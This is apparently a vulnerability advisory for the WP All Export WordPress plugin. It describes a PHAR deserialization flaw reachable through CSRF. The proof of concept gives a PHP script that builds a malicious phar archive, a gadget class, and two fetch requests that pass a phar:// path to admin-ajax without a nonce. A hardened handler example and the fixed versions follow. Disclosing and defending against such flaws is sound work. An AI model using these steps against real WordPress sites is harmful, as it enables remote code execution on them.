WordPress Plugin Vulnerabilities

WP All Export (Free < 1.4.1, Pro < 1.8.6) - Author+ PHAR Deserialization via CSRF

Description

The plugin does not verify nonce tokens early enough in the request lifecycle. An attacker who can upload files to the server (Author+ role) can therefore trick a logged-in user into performing unwanted actions that trigger PHAR deserialization, which may lead to remote code execution.

Proof of Concept

1. Ensure your WordPress installation is using PHP version 7.4 or earlier.
2. Create a `poc.phar` file using the following script, and place the resulting archive in the web root of the server:

<?php
// Generator for poc.phar. Creating a Phar requires phar.readonly=0
// (for example: php -d phar.readonly=0 create_poc.php), otherwise
// Phar::addFromString() throws an exception.

// Placeholder class stored in the archive metadata; the server-side
// gadget in step 3 defines the behaviour that runs on unserialize().
class Evil {}

try
{
    $pharFile = 'poc.phar';

    // Start from a clean file so stale contents do not interfere.
    if (file_exists($pharFile))
    {
        unlink($pharFile);
    }

    $phar = new Phar($pharFile);

    $phar->startBuffering();
        // Any file entry works; 'test.txt' is the path referenced in step 4.
        $phar->addFromString( 'test.txt', 'text' );
        // Minimal stub: the archive needs no executable code of its own.
        $phar->setStub( '<?php __HALT_COMPILER(); ?>' );
        // The serialized metadata is what gets unserialized on file access.
        $phar->setMetadata( new Evil() );
    $phar->stopBuffering();

    echo "$pharFile successfully created" . PHP_EOL;
}
catch (Exception $e)
{
    echo $e->getMessage();
}


3. Add the following code to the server to simulate a gadget:

<?php
// Stand-in gadget: a class with the same name as the one in the archive
// metadata. __wakeup() runs when the metadata is unserialized, so the die()
// message is the visible proof that deserialization happened.
class Evil {
    function __wakeup() {
        die('Arbitrary deserialization');
    }
}


4. Run the following code in your browser's console, while logged in as a Super Admin user, to create a new export, and note the ID of the export that is created. Notice that no nonce is required. Replace the `/var/www/html` directory if needed.

// Relative URL: the request goes to the WordPress site currently open in the browser.
// The phar:// filepath is accepted without any nonce or wrapper check.
await fetch("/wp-admin/admin-ajax.php?action=options&page=pmxe-admin-export", {
    "credentials": "include",
    "headers": {
        "Content-Type": "application/x-www-form-urlencoded",
    },
    "method": "POST",
    "body": "update_previous=0&filepath=phar:///var/www/html/poc.phar/test.txt&export_to=XmlGoogleMerchants",
    "mode": "cors",
});

5. Run the following code in your browser, as a Super Admin (again, no nonce is needed), replacing `ID` with the ID of the export created in the previous step, and confirm from the response that the PHAR deserialization occurred.

// Same site as step 4 (relative URL); ID is the export ID noted in step 4.
// Serving the export triggers a filesystem call on the phar:// path.
await fetch("/wp-admin/admin-ajax.php?action=download&page=pmxe-admin-export&google_feed=1&id=ID", {
    "credentials": "include",
    "headers": {},
    "method": "GET",
    "mode": "cors",
});
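The description names two defects: the nonce is verified too late, and a user-supplied path that can carry a stream wrapper reaches a filesystem call. The following added example shows a hardened admin-ajax handler that addresses both. It is not WP All Export's own code: every name prefixed with `example_` is hypothetical, while `check_ajax_referer`, `current_user_can`, `wp_send_json_error`, `wp_upload_dir`, `wp_unslash` and `add_action` are real WordPress core functions.

```php
<?php
// Added example, not WP All Export's code. "example_"-prefixed names are
// hypothetical; the WordPress functions used are real core APIs.

/**
 * Returns true only for a plain, existing local path inside $allowed_root.
 *
 * The scheme check runs BEFORE any filesystem call: on PHP 7.4 and earlier,
 * even file_exists('phar://...') unserializes the archive metadata, so the
 * string itself must be rejected first.
 */
function example_is_safe_local_path(string $path, string $allowed_root): bool {
    // Reject any stream wrapper (phar://, php://, data://, ftp://, ...).
    if (preg_match('#^[a-z][a-z0-9+.\-]*://#i', $path)) {
        return false;
    }
    // Resolve symlinks and ".." segments; realpath() returns false for
    // non-existent files, which is also treated as a rejection.
    $real = realpath($path);
    $root = realpath($allowed_root);
    if ($real === false || $root === false) {
        return false;
    }
    $root = rtrim($root, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    return strncmp($real, $root, strlen($root)) === 0;
}

/**
 * admin-ajax handler for a "create export" action. The nonce is verified
 * first, before any other request parameter is read, so a request forged
 * from another origin is rejected before it can reach the path handling.
 */
function example_handle_export_options(): void {
    // check_ajax_referer() ends the request with -1 if the nonce is missing
    // or invalid. The legitimate form obtains its token with
    // wp_create_nonce('example_export_options').
    check_ajax_referer('example_export_options', '_wpnonce');

    // Capability check: a nonce proves intent, not authorization.
    if (!current_user_can('manage_options')) {
        wp_send_json_error('forbidden', 403);
    }

    $filepath = isset($_POST['filepath']) ? wp_unslash((string) $_POST['filepath']) : '';
    $uploads  = wp_upload_dir();

    if (!example_is_safe_local_path($filepath, $uploads['basedir'])) {
        wp_send_json_error('filepath must be a plain local file inside the uploads directory', 400);
    }

    // Only now is it safe to touch the file: $filepath can no longer be a
    // phar:// (or any other wrapper) URL.
    $contents = file_get_contents($filepath);
    wp_send_json_success(array('bytes' => strlen($contents)));
}
add_action('wp_ajax_example_export_options', 'example_handle_export_options');
```

Two design points: the wrapper check is a string test on purpose, because on the affected PHP versions the deserialization happens inside the very filesystem call one might otherwise use to validate the path; and the nonce check precedes even reading `$_POST['filepath']`, which is the ordering the advisory says the plugin got wrong. As defence in depth, `stream_wrapper_unregister('phar')` early in the request removes the `phar://` wrapper entirely, at the cost of breaking any legitimate Phar usage on that site.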

Affects Plugins

WP All Export (Free): fixed in 1.4.1
WP All Export Pro: fixed in 1.8.6

Miscellaneous

Submitter
Alex Sanford
Verified
Yes

Timeline

Publicly Published
2023-11-21
Added
2023-11-21
Last Updated
2023-11-21